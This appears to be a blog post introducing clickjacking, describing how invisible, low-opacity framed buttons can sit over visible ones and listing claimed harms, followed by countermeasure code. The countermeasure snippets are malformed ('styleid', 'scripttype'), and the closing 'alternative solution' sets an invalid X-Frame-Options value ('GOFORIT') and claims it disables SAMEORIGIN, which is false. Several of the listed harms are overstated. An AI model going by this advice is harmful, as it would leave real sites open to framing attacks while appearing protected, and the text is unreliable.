Visually Hacked - Clickjacking

INTRODUCTION:

What is "CLICKIJACKING"? This is a process where the attacker is going to fool us with some visual effects. Hiding some buttons or some kind of operational website behind the original website. I refer to it as "Never even believe your eyes" they can manipulate your thoughts. Now let's see it in depth.

The word means the template the image or content that you are viewing is referred to Visuals. We visit a lot of web sites daily like:

• Facebook

• Twitter

• Instagram

• New pages

• Google

• Youtube

You go through a lot of buttons and referential texts which will redirect you to a new page or some other tab giving you some unique results. Are you sure that the website in the backend is the same as it is visible on your screens?

No, when you click on some button or some referential content there might be chances that the button you are clicking has some malicious switch on it which is not visible to us. What about an invisible man? can we see him? yes that sounds crazy but we can't see the invisible things but their functionality will be done accordingly whether you notice them or not.

Now let's see how is clickjacking done with some visuals (images) the image you see is having a like button and have some text hello November and see what we think it's just a like button where it will increase a count of like to that particular page or post and it's just done when you like the content of the post.

But what do you think of the subscribe button? Where did it come from? This is the tricky part to be observed as I have said to you that an invisible item known as the backend will be doing the work assigned with or without you notice in the similar way a subscribe button is an invisible component placed on the like button the only difference is that like button is visible and the subscribe button is not.

To give you the explanation in short. The opacity of the button is just decreased so that it can be made invisible and that can be taken advantage of and make the unwanted things at the backend without your attention. You can see it in the video to get good clarity.

To be specific :

1. This is a super cool method to get access to anyone's webcam.

2. A bank transaction can be done.

3. Your chrome saved passwords can be deleted.

4. Your social accounts can be deactivated when you have forgotten to log them out.

5. What not everything else is most likely covered with a clickjacking.

Note: The Websites that you want to embed must be vulnerable to clickjacking so that you can place them one on each other

I know this question will be raised in your mind the only information that I can give you legally here is that the embedding of the two HTML pages is done with the help of the <iframes> tag which helps us to embed the HTML pages.

Count measures:

To implement this preventive measure, add the following code in the HEAD element of your script. Note how an ID is added to the STYLE element. This is important for the next steps.

<styleid="antiClickjack">
body{
display:none !important;
} </style>

Now, delete that STYLE element after the implementation of the script:

<scripttype="text/javascript">
    if (self === top) {         
        var antiClickjack = document.getElementById("antiClickjack"); 
        antiClickjack.parentNode.removeChild(antiClickjack);                                                                 
    } else {         
        top.location = self.location;     
    } 
</script>

Alternative solution:

Try sending another X-Frame-Options header, add

<?php header('X-Frame-Options: GOFORIT'); ?>

to the top of your page. It should disable the SAMEORIGIN command.